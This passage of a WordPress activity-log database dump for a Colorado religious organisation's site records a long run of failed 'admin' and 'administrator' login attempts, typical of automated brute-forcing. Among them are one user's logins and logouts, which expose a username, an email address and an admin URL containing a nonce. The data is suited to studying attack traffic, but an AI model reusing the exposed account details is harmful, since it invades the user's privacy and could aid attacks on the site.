32343,39364,'user_login','S8zhaBda'),(232344,39364,'_user_id','2'),(232345,39364,'_user_login','S8zhaBda'),(232346,39364,'_user_email','nada@zipnadanot.org'),(232347,39364,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(232348,39364,'_message_key','user_logged_in'),(232349,39364,'_server_remote_addr','76.130.120.x'),(232350,39364,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(232351,39365,'failed_username','admin'),(232352,39365,'server_http_user_agent','Mozilla/5.0'),(232353,39365,'_message_key','user_unknown_login_failed'),(232354,39365,'_server_remote_addr','20.168.6.x'),(232355,39366,'failed_username','admin'),(232356,39366,'server_http_user_agent','Mozilla/5.0'),(232357,39366,'_message_key','user_unknown_login_failed'),(232358,39366,'_server_remote_addr','20.168.9.x'),(232359,39367,'failed_username','admin'),(232360,39367,'server_http_user_agent','Mozilla/5.0'),(232361,39367,'_message_key','user_unknown_login_failed'),(232362,39367,'_server_remote_addr','20.38.46.x'),(232363,39368,'failed_username','admin'),(232364,39368,'server_http_user_agent','Mozilla/5.0'),(232365,39368,'_message_key','user_unknown_login_failed'),(232366,39368,'_server_remote_addr','20.163.25.x'),(232367,39369,'_user_id','2'),(232368,39369,'_user_login','S8zhaBda'),(232369,39369,'_user_email','nada@zipnadanot.org'),(232370,39369,'_message_key','user_logged_out'),(232371,39369,'_server_remote_addr','76.130.120.x'),(232372,39369,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=041d473945&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F23%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F23%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(232373,39370,'failed_username','admin'),(232374,39370,'server_http_user_agent','Mozilla/5.0'),(232375,39370,'_message_key','user_unknown_login_failed'),(232376,39370,'_server_remote_addr','20.38.46.x'),(232377,39371,'failed_username','admin'),(232378,39371,'server_http_user_agent','Mozilla/5.0'),(232379,39371,'_message_key','user_unknown_login_failed'),(232380,39371,'_server_remote_addr','20.168.9.x'),(232381,39372,'failed_username','admin'),(232382,39372,'server_http_user_agent','Mozilla/5.0'),(232383,39372,'_message_key','user_unknown_login_failed'),(232384,39372,'_server_remote_addr','20.163.25.x'),(232385,39373,'failed_username','admin'),(232386,39373,'server_http_user_agent','Mozilla/5.0'),(232387,39373,'_message_key','user_unknown_login_failed'),(232388,39373,'_server_remote_addr','20.168.6.x'),(232389,39374,'failed_username','admin'),(232390,39374,'server_http_user_agent','Mozilla/5.0'),(232391,39374,'_message_key','user_unknown_login_failed'),(232392,39374,'_server_remote_addr','20.38.46.x'),(232393,39375,'failed_username','admin'),(232394,39375,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(232395,39375,'_message_key','user_unknown_login_failed'),(232396,39375,'_server_remote_addr','69.163.224.x'),(232397,39376,'failed_username','admin'),(232398,39376,'server_http_user_agent','Mozilla/5.0'),(232399,39376,'_message_key','user_unknown_login_failed'),(232400,39376,'_server_remote_addr','20.168.9.x'),(232401,39377,'failed_username','admin'),(232402,39377,'server_http_user_agent','Mozilla/5.0'),(232403,39377,'_message_key','user_unknown_login_failed'),(232404,39377,'_server_remote_addr','20.163.25.x'),(232405,39378,'failed_username','administrator'),(232406,39378,'server_http_user_agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(232407,39378,'_message_key','user_unknown_login_failed'),(232408,39378,'_server_remote_addr','45.61.185.x'),(232409,39379,'failed_username','admin'),(232410,39379,'server_http_user_agent','Mozilla/5.0'),(232411,39379,'_message_key','user_unknown_login_failed'),(232412,39379,'_server_remote_addr','20.38.46.x'),(232413,39380,'failed_username','admin'),(232414,39380,'server_http_user_agent','Mozilla/5.0'),(232415,39380,'_message_key','user_unknown_login_failed'),(232416,39380,'_server_remote_addr','20.168.6.x'),(232417,39381,'failed_username','admin'),(232418,39381,'server_http_user_agent','Mozilla/5.0'),(232419,39381,'_message_key','user_unknown_login_failed'),(232420,39381,'_server_remote_addr','20.168.9.x'),(232421,39382,'failed_username','admin'),(232422,39382,'server_http_user_agent','Mozilla/5.0'),(232423,39382,'_message_key','user_unknown_login_failed'),(232424,39382,'_server_remote_addr','20.163.25.x'),(232425,39383,'failed_username','admin'),(232426,39383,'server_http_user_agent','Mozilla/5.0'),(232427,39383,'_message_key','user_unknown_login_failed'),(232428,39383,'_server_remote_addr','20.38.46.x'),(232429,39384,'failed_username','admin'),(232430,39384,'server_http_user_agent','Mozilla/5.0'),(232431,39384,'_message_key','user_unknown_login_failed'),(232432,39384,'_server_remote_addr','20.168.9.x'),(232433,39385,'failed_username','admin'),(232434,39385,'server_http_user_agent','Mozilla/5.0'),(232435,39385,'_message_key','user_unknown_login_failed'),(232436,39385,'_server_remote_addr','20.163.25.x'),(232437,39386,'failed_username','admin'),(232438,39386,'server_http_user_agent','Mozilla/5.0'),(232439,39386,'_message_key','user_unknown_login_failed'),(232440,39386,'_server_remote_addr','20.38.46.x'),(232441,39387,'failed_username','admin'),(232442,39387,'server_http_user_agent','Mozilla/5.0'),(232443,39387,'_message_key','user_unknown_login_failed'),(232444,39387,'_server_remote_addr','20.168.6.x'),(232445,39388,'failed_username','admin'),(232446,39388,'server_http_user_agent','Mozilla/5.0'),(232447,39388,'_message_key','user_unknown_login_failed'),(232448,39388,'_server_remote_addr','20.168.9.x'),(232449,39389,'failed_username','admin'),(232450,39389,'server_http_user_agent','Mozilla/5.0'),(232451,39389,'_message_key','user_unknown_login_failed'),(232452,39389,'_server_remote_addr','20.38.46.x'),(232453,39390,'failed_username','admin'),(232454,39390,'server_http_user_agent','Mozilla/5.0'),(232252,39342,'failed_username','admin'),(232253,39342,'server_http_user_agent','Mozilla/5.0'),(232254,39342,'_message_key','user_unknown_login_failed'),(232255,39342,'_server_remote_addr','20.168.6.x'),(232256,39343,'failed_username','admin'),(232257,39343,'server_http_user_agent','Mozilla/5.0'),(232258,39343,'_message_key','user_unknown_login_failed'),(232259,39343,'_server_remote_addr','20.168.6.x'),(232260,39344,'failed_username','admin'),(232261,39344,'server_http_user_agent','Mozilla/5.0'),(232262,39344,'_message_key','user_unknown_login_failed'),(232263,39344,'_server_remote_addr','20.168.6.x'),(232264,39345,'failed_username','admin'),(232265,39345,'server_http_user_agent','Mozilla/5.0'),(232249,39341,'_message_key','post_updated'),(232250,39341,'_server_remote_addr','98.46.117.x'),(232251,39341,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(232246,39341,'post_id','269243'),(232247,39341,'post_type','nf_sub'),(232248,39341,'post_title',''),(232244,39340,'_message_key','user_unknown_login_failed'),(232245,39340,'_server_remote_addr','46.105.29.x'),(232228,39336,'_server_remote_addr','20.168.6.x'),(232229,39337,'failed_username','admin'),(232230,39337,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(232231,39337,'_message_key','user_unknown_login_failed'),(232232,39337,'_xmlrpc_request','true'),(232233,39337,'_server_remote_addr','20.163.25.x'),(232234,39338,'failed_username','admin'),(232235,39338,'server_http_user_agent','Mozilla/5.0'),(232236,39338,'_message_key','user_unknown_login_failed'),(232237,39338,'_server_remote_addr','20.168.6.x'),(232238,39339,'failed_username','admin'),(232239,39339,'server_http_user_agent','Mozilla/5.0'),(232240,39339,'_message_key','user_unknown_login_failed'),(232241,39339,'_server_remote_addr','20.168.6.x'),(232242,39340,'failed_username','admin'),(232243,39340,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(232227,39336,'_message_key','user_unknown_login_failed'),(232226,39336,'server_http_user_agent','Mozilla/5.0'),(232225,39336,'failed_username','admin'),(232224,39335,'_server_remote_addr','35.187.58.x'),(232223,39335,'_message_key','user_unknown_login_failed'),(232221,39335,'failed_username','admin'),(232222,39335,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(232220,39334,'_server_remote_addr','20.38.46.x'),(232219,39334,'_xmlrpc_request','true'),(232218,39334,'_message_key','user_unknown_login_failed'),(232216,39334,'failed_username','admin'),(232217,39334,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(232214,39333,'_message_key','user_unknown_login_failed'),(232215,39333,'_server_remote_addr','20.168.6.x'),(232213,39333,'server_http_user_agent','Mozilla/5.0'),(232212,39333,'failed_username','admin'),(232211,39332,'_server_remote_addr','20.168.6.x'),(232210,39332,'_message_key','user_unknown_login_failed'),(232206,39331,'_message_key','user_unknown_login_failed'),(232207,39331,'_server_remote_addr','67.205.12.x'),(232208,39332,'failed_username','admin'),(232209,39332,'server_http_user_agent','Mozilla/5.0'),(232205,39331,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(232204,39331,'failed_username','admin'),(232203,39330,'_server_remote_addr','20.168.6.x'),(232202,39330,'_message_key','user_unknown_login_failed'),(232201,39330,'server_http_user_agent','Mozilla/5.0'),(232200,39330,'failed_username','admin'),(232199,39329,'_server_remote_addr','20.168.6.x'),(232198,39329,'_message_key','user_unknown_login_failed'),(232144,39316,'failed_username','admin'),(232145,39316,'server_http_user_agent','Mozilla/5.0'),(232146,39316,'_message_key','user_unknown_login_failed'),(232147,39316,'_server_remote_addr','20.168.6.x'),(232148,39317,'failed_username','admin'),(232149,39317,'server_http_user_agent','Mozilla/5.0'),(232150,39317,'_message_key','user_unknown_login_failed'),(232151,39317,'_server_remote_addr','20.14.94.x'),(232152,39318,'failed_username','admin'),(232153,39318,'server_http_user_agent','Mozilla/5.0'),(232154,39318,'_message_key','user_unknown_login_failed'),(232155,39318,'_server_remote_addr','20.14.94.x'),(232156,39319,'failed_username','admin'),(232157,39319,'server_http_user_agent','Mozilla/5.0'),(232158,39319,'_message_key','user_unknown_login_failed'),(232159,39319,'_server_remote_addr','20.14.94.x'),(232160,39320,'failed_username','admin'),(232161,39320,'server_http_user_agent','Mozilla/5.0'),(232162,39320,'_message_key','user_unknown_login_failed'),(232163,39320,'_server_remote_addr','20.168.6.x'),(232164,39321,'failed_username','admin'),(232165,39321,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(232166,39321,'_message_key','user_unknown_login_failed'),(232167,39321,'_server_remote_addr','178.128.187.x'),(232168,39322,'failed_username','admin'),(232169,39322,'server_http_user_agent','Mozilla/5.0'),(232170,39322,'_message_key','user_unknown_login_failed'),(232171,39322,'_server_remote_addr','20.14.94.x'),(232172,39323,'failed_username','admin'),(232173,39323,'server_http_user_agent','Mozilla/5.0'),(232174,39323,'_message_key','user_unknown_login_failed'),(232175,39323,'_server_remote_addr','20.14.94.x'),(232176,39324,'failed_username','admin'),(232177,39324,'server_http_user_agent','Mozilla/5.0'),(232178,39324,'_message_key','user_unknown_login_failed'),(232179,39324,'_server_remote_addr','20.168.6.x'),(232180,39325,'failed_username','admin'),(232181,39325,'server_http_user_agent','Mozilla/5.0'),(232182,39325,'_message_key','user_unknown_login_failed'),(232183,39325,'_server_remote_addr','20.14.94.x'),(232184,39326,'failed_username','admin'),(232185,39326,'server_http_user_agent','Mozilla/5.0'),(232186,39326,'_message_key','user_unknown_login_failed'),(232187,39326,'_server_remote_addr','20.168.6.x'),(232188,39327,'failed_username','admin'),(232189,39327,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(232190,39327,'_message_key','user_unknown_login_failed'),(232191,39327,'_server_remote_addr','23.99.229.x'),(232192,39328,'failed_username','admin'),(232193,39328,'server_http_user_agent','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),(232194,39328,'_message_key','user_unknown_login_failed'),(232195,39328,'_server_remote_addr','199.195.250.x'),(232196,39329,'failed_username','admin'),(232197,39329,'server_http_user_agent','Mozilla/5.0'),(231981,39275,'_message_key','user_unknown_login_failed'),(231982,39275,'_server_remote_addr','20.168.6.x'),(231983,39276,'failed_username','admin'),(231984,39276,'server_http_user_agent','Mozilla/5.0'),(231985,39276,'_message_key','user_unknown_login_failed'),(231986,39276,'_server_remote_addr','20.168.8.x'),(231987,39277,'failed_username','admin'),(231988,39277,'server_http_user_agent','Mozilla/5.0'),(231989,39277,'_message_key','user_unknown_login_failed'),(231990,39277,'_server_remote_addr','20.168.8.x'),(231991,39278,'failed_username','admin'),(231992,39278,'server_http_user_agent','Mozilla/5.0'),(231993,39278,'_message_key','user_unknown_login_failed'),(231994,39278,'_server_remote_addr','20.168.6.x'),(231995,39279,'failed_username','admin'),(231996,39279,'server_http_user_agent','Mozilla/5.0'),(231997,39279,'_message_key','user_unknown_login_failed'),(231998,39279,'_server_remote_addr','20.168.8.x'),(231999,39280,'failed_username','admin'),(232000,39280,'server_http_user_agent','Mozilla/5.0'),(232001,39280,'_message_key','user_unknown_login_failed'),(232002,39280,'_server_remote_addr','20.168.8.x'),(232003,39281,'failed_username','admin'),(232004,39281,'server_http_user_agent','Mozilla/5.0'),(232005,39281,'_message_key','user_unknown_login_failed'),(232006,39281,'_server_remote_addr','20.168.6.x'),(232007,39282,'failed_username','admin'),(232008,39282,'server_http_user_agent','Mozilla/5.0'),(232009,39282,'_message_key','user_unknown_login_failed'),(232010,39282,'_server_remote_addr','20.168.8.x'),(232011,39283,'failed_username','admin'),(232012,39283,'server_http_user_agent','Mozilla/5.0'),(232013,39283,'_message_key','user_unknown_login_failed'),(232014,39283,'_server_remote_addr','20.168.6.x'),(232015,39284,'failed_username','admin'),(232016,39284,'server_http_user_agent','Mozilla/5.0'),(232017,39284,'_message_key','user_unknown_login_failed'),(232018,39284,'_server_remote_addr','20.168.8.x'),(232019,39285,'failed_username','admin'),(232020,39285,'server_http_user_agent','Mozilla/5.0'),(232021,39285,'_message_key','user_unknown_login_failed'),(232022,39285,'_server_remote_addr','20.168.6.x'),(232023,39286,'failed_username','admin'),(232024,39286,'server_http_user_agent','Mozilla/5.0'),(232025,39286,'_message_key','user_unknown_login_failed'),(232026,39286,'_server_remote_addr','20.168.6.x'),(232027,39287,'failed_username','admin'),(232028,39287,'server_http_user_agent','Mozilla/5.0'),(232029,39287,'_message_key','user_unknown_login_failed'),(232030,39287,'_server_remote_addr','20.168.6.x'),(232031,39288,'failed_username','admin'),(232032,39288,'server_http_user_agent','Mozilla/5.0'),(232033,39288,'_message_key','user_unknown_login_failed'),(232034,39288,'_server_remote_addr','20.168.6.x'),(232035,39289,'failed_username','admin'),(232036,39289,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(232037,39289,'_message_key','user_unknown_login_failed'),(232038,39289,'_server_remote_addr','209.141.56.x'),(232039,39290,'failed_username','admin'),(232040,39290,'server_http_user_agent','Mozilla/5.0'),(232041,39290,'_message_key','user_unknown_login_failed'),(232042,39290,'_server_remote_addr','20.168.6.x'),(232043,39291,'failed_username','administrator'),(232044,39291,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(232045,39291,'_message_key','user_unknown_login_failed'),(232046,39291,'_server_remote_addr','205.185.115.x'),(232047,39292,'failed_username','admin'),(232143,39315,'_server_remote_addr','20.14.94.x'),(232142,39315,'_message_key','user_unknown_login_failed'),(232141,39315,'server_http_user_agent','Mozilla/5.0'),(232139,39314,'_server_remote_addr','20.14.94.x'),(232140,39315,'failed_username','admin'),(232138,39314,'_message_key','user_unknown_login_failed'),(232136,39314,'failed_username','admin'),(232137,39314,'server_http_user_agent','Mozilla/5.0'),(232135,39313,'_server_remote_addr','20.168.6.x'),(232134,39313,'_message_key','user_unknown_login_failed'),(232132,39313,'failed_username','admin'),(232133,39313,'server_http_user_agent','Mozilla/5.0'),(232131,39312,'_server_remote_addr','20.14.94.x'),(232130,39312,'_message_key','user_unknown_login_failed'),(232129,39312,'server_http_user_agent','Mozilla/5.0'),(232128,39312,'failed_username','admin'),(232127,39311,'_server_remote_addr','173.236.168.x'),(232126,39311,'_message_key','user_unknown_login_failed'),(232124,39311,'failed_username','admin'),(232125,39311,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(232123,39310,'_server_remote_addr','20.14.94.x'),(232122,39310,'_message_key','user_unknown_login_failed'),(232121,39310,'server_http_user_agent','Mozilla/5.0'),(232120,39310,'failed_username','admin'),(232119,39309,'_server_remote_addr','20.14.94.x'),(232118,39309,'_message_key','user_unknown_login_failed'),(232116,39309,'failed_username','admin'),(232117,39309,'server_http_user_agent','Mozilla/5.0'),(232115,39308,'_server_remote_addr','20.168.6.x'),(232113,39308,'server_http_user_agent','Mozilla/5.0'),(232114,39308,'_message_key','user_unknown_login_failed'),(232112,39308,'failed_username','admin'),(232111,39307,'_server_remote_addr','20.14.94.x'),(232110,39307,'_message_key','user_unknown_login_failed'),(232109,39307,'server_http_user_agent','Mozilla/5.0'),(232108,39307,'failed_username','admin'),(232107,39306,'_server_remote_addr','20.14.94.x'),(232106,39306,'_message_key','user_unknown_login_failed'),(232105,39306,'server_http_user_agent','Mozilla/5.0'),(232104,39306,'failed_username','admin'),(232103,39305,'_server_remote_addr','20.168.6.x'),(232101,39305,'server_http_user_agent','Mozilla/5.0'),(232102,39305,'_message_key','user_unknown_login_failed'),(232100,39305,'failed_username','admin'),(232099,39304,'_server_remote_addr','46.105.29.x'),(232098,39304,'_message_key','user_unknown_login_failed'),(232097,39304,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(232095,39303,'_server_remote_addr','20.14.94.x'),(232096,39304,'failed_username','admin'),(232094,39303,'_message_key','user_unknown_login_failed'),(232093,39303,'server_http_user_agent','Mozilla/5.0'),(232092,39303,'failed_username','admin'),(232091,39302,'_server_remote_addr','20.168.6.x'),(232089,39302,'server_http_user_agent','Mozilla/5.0'),(232090,39302,'_message_key','user_unknown_login_failed'),(232088,39302,'failed_username','admin'),(232087,39301,'_server_remote_addr','198.98.57.x'),(232086,39301,'_message_key','user_unknown_login_failed'),(232085,39301,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(232084,39301,'failed_username','administrator'),(232083,39300,'_server_remote_addr','20.168.6.x'),(232082,39300,'_message_key','user_unknown_login_failed'),(232080,39300,'failed_username','admin'),(232081,39300,'server_http_user_agent','Mozilla/5.0'),(232079,39299,'_server_remote_addr','172.200.234.x'),(232078,39299,'_xmlrpc_request','true'),(232077,39299,'_message_key','user_unknown_login_failed'),(232076,39299,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(232075,39299,'failed_username','admin'),(232074,39298,'_server_remote_addr','94.245.105.x'),(232073,39298,'_message_key','user_unknown_login_failed'),(232048,39292,'server_http_user_agent','Mozilla/5.0'),(232049,39292,'_message_key','user_unknown_login_failed'),(232050,39292,'_server_remote_addr','20.168.6.x'),(232051,39293,'failed_username','admin'),(232052,39293,'server_http_user_agent','Mozilla/5.0'),(232053,39293,'_message_key','user_unknown_login_failed'),(232054,39293,'_server_remote_addr','20.168.6.x'),(232055,39294,'failed_username','admin'),(232056,39294,'server_http_user_agent','Mozilla/5.0'),(232057,39294,'_message_key','user_unknown_login_failed'),(232058,39294,'_server_remote_addr','20.168.6.x'),(232059,39295,'failed_username','admin'),(232060,39295,'server_http_user_agent','Mozilla/5.0'),(232061,39295,'_message_key','user_unknown_login_failed'),(232062,39295,'_server_remote_addr','20.168.6.x'),(232063,39296,'failed_username','admin'),(232064,39296,'server_http_user_agent','Mozilla/5.0'),(232065,39296,'_message_key','user_unknown_login_failed'),(232066,39296,'_server_remote_addr','20.168.6.x'),(232067,39297,'failed_username','admin'),(232068,39297,'server_http_user_agent','Mozilla/5.0'),(232069,39297,'_message_key','user_unknown_login_failed'),(232070,39297,'_server_remote_addr','20.168.6.x'),(232071,39298,'failed_username','admin'),(232072,39298,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(231978,39274,'_server_remote_addr','20.168.8.x'),(231979,39275,'failed_username','admin'),(231980,39275,'server_http_user_agent','Mozilla/5.0'),(231977,39274,'_message_key','user_unknown_login_failed'),(231976,39274,'server_http_user_agent','Mozilla/5.0'),(231975,39274,'failed_username','admin'),(231974,39273,'_server_remote_addr','209.141.34.x'),(231973,39273,'_message_key','user_unknown_login_failed'),(231972,39273,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(231971,39273,'failed_username','admin'),(231970,39272,'_server_remote_addr','20.168.8.x'),(231968,39272,'server_http_user_agent','Mozilla/5.0'),(231969,39272,'_message_key','user_unknown_login_failed'),(231967,39272,'failed_username','admin'),(231966,39271,'_server_remote_addr','20.168.6.x'),(231965,39271,'_message_key','user_unknown_login_failed'),(231964,39271,'server_http_user_agent','Mozilla/5.0'),(231963,39271,'failed_username','admin'),(231962,39270,'_server_remote_addr','20.168.8.x'),(231960,39270,'server_http_user_agent','Mozilla/5.0'),(231961,39270,'_message_key','user_unknown_login_failed'),(231957,39269,'_message_key','user_unknown_login_failed'),(231958,39269,'_server_remote_addr','20.168.8.x'),(231959,39270,'failed_username','admin'),(231956,39269,'server_http_user_agent','Mozilla/5.0'),(231955,39269,'failed_username','admin'),(231951,39268,'failed_username','admin'),(231952,39268,'server_http_user_agent','Mozilla/5.0'),(231953,39268,'_message_key','user_unknown_login_failed'),(231954,39268,'_server_remote_addr','20.168.6.x'),(231950,39267,'_server_remote_addr','20.168.8.x'),(231947,39267,'failed_username','admin'),(231948,39267,'server_http_user_agent','Mozilla/5.0'),(231949,39267,'_message_key','user_unknown_login_failed'),(231946,39266,'_server_remote_addr','20.168.8.x'),(231942,39265,'_server_remote_addr','20.14.80.x'),(231943,39266,'failed_username','admin'),(231944,39266,'server_http_user_agent','Mozilla/5.0'),(231945,39266,'_message_key','user_unknown_login_failed'),(231941,39265,'_message_key','user_unknown_login_failed'),(231937,39264,'_message_key','user_unknown_login_failed'),(231938,39264,'_server_remote_addr','20.168.8.x'),(231939,39265,'failed_username','admin'),(231940,39265,'server_http_user_agent','Mozilla/5.0'),(231936,39264,'server_http_user_agent','Mozilla/5.0'),(231935,39264,'failed_username','admin'),(231861,39245,'_server_remote_addr','20.14.80.x'),(231862,39246,'failed_username','admin'),(231863,39246,'server_http_user_agent','Mozilla/5.0'),(231864,39246,'_message_key','user_unknown_login_failed'),(231865,39246,'_server_remote_addr','20.14.80.x'),(231866,39247,'failed_username','admin'),(231867,39247,'server_http_user_agent','Mozilla/5.0'),(231868,39247,'_message_key','user_unknown_login_failed'),(231869,39247,'_server_remote_addr','20.14.80.x'),(231870,39248,'failed_username','admin'),(231871,39248,'server_http_user_agent','Mozilla/5.0'),(231872,39248,'_message_key','user_unknown_login_failed'),(231873,39248,'_server_remote_addr','20.14.80.x'),(231874,39249,'failed_username','admin'),(231875,39249,'server_http_user_agent','Mozilla/5.0'),(231876,39249,'_message_key','user_unknown_login_failed'),(231877,39249,'_server_remote_addr','20.14.80.x'),(231878,39250,'failed_username','admin'),(231879,39250,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(231880,39250,'_message_key','user_unknown_login_failed'),(231881,39250,'_server_remote_addr','104.244.79.x'),(231882,39251,'failed_username','admin'),(231883,39251,'server_http_user_agent','Mozilla/5.0'),(231884,39251,'_message_key','user_unknown_login_failed'),(231885,39251,'_server_remote_addr','20.14.80.x'),(231886,39252,'failed_username','admin'),(231887,39252,'server_http_user_agent','Mozilla/5.0'),(231888,39252,'_message_key','user_unknown_login_failed'),(231889,39252,'_server_remote_addr','20.14.80.x'),(231890,39253,'failed_username','admin'),(231891,39253,'server_http_user_agent','Mozilla/5.0'),(231892,39253,'_message_key','user_unknown_login_failed'),(231893,39253,'_server_remote_addr','20.14.80.x'),(231894,39254,'failed_username','admin'),(231895,39254,'server_http_user_agent','Mozilla/5.0'),(231896,39254,'_message_key','user_unknown_login_failed'),(231897,39254,'_server_remote_addr','20.14.80.x'),(231898,39255,'failed_username','admin'),(231899,39255,'server_http_user_agent','Mozilla/5.0'),(231900,39255,'_message_key','user_unknown_login_failed'),(231901,39255,'_server_remote_addr','20.14.80.x'),(231902,39256,'failed_username','admin'),(231903,39256,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(231904,39256,'_message_key','user_unknown_login_failed'),(231905,39256,'_xmlrpc_request','true'),(231906,39256,'_server_remote_addr','20.168.8.x'),(231907,39257,'failed_username','admin'),(231908,39257,'server_http_user_agent','Mozilla/5.0'),(231909,39257,'_message_key','user_unknown_login_failed'),(231910,39257,'_server_remote_addr','20.14.80.x'),(231911,39258,'failed_username','admin'),(231912,39258,'server_http_user_agent','Mozilla/5.0'),(231913,39258,'_message_key','user_unknown_login_failed'),(231914,39258,'_server_remote_addr','20.14.80.x'),(231915,39259,'failed_username','admin'),(231916,39259,'server_http_user_agent','Mozilla/5.0'),(231917,39259,'_message_key','user_unknown_login_failed'),(231918,39259,'_server_remote_addr','20.14.80.x'),(231919,39260,'failed_username','admin'),(231920,39260,'server_http_user_agent','Mozilla/5.0'),(231921,39260,'_message_key','user_unknown_login_failed'),(231922,39260,'_server_remote_addr','20.14.80.x'),(231923,39261,'failed_username','admin'),(231924,39261,'server_http_user_agent','Mozilla/5.0'),(231925,39261,'_message_key','user_unknown_login_failed'),(231926,39261,'_server_remote_addr','20.14.80.x'),(231927,39262,'failed_username','administrator'),(231928,39262,'server_http_user_agent','Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),(231929,39262,'_message_key','user_unknown_login_failed'),(231930,39262,'_server_remote_addr','199.195.250.x'),(231931,39263,'failed_username','admin'),(231932,39263,'server_http_user_agent','Mozilla/5.0'),(231933,39263,'_message_key','user_unknown_login_failed'),(231934,39263,'_server_remote_addr','20.14.80.x'),(231859,39245,'server_http_user_agent','Mozilla/5.0'),(231860,39245,'_message_key','user_unknown_login_failed'),(231855,39244,'server_http_user_agent','Mozilla/5.0'),(231856,39244,'_message_key','user_unknown_login_failed'),(231857,39244,'_server_remote_addr','20.14.80.x'),(231858,39245,'failed_username','admin'),(231853,39243,'_server_remote_addr','20.14.80.x'),(231854,39244,'failed_username','admin'),(231852,39243,'_message_key','user_unknown_login_failed'),(231851,39243,'server_http_user_agent','Mozilla/5.0'),(231848,39242,'_message_key','user_unknown_login_failed'),(231849,39242,'_server_remote_addr','45.61.187.x'),(231850,39243,'failed_username','admin'),(231845,39241,'_server_remote_addr','20.14.80.x'),(231846,39242,'failed_username','admin'),(231847,39242,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) 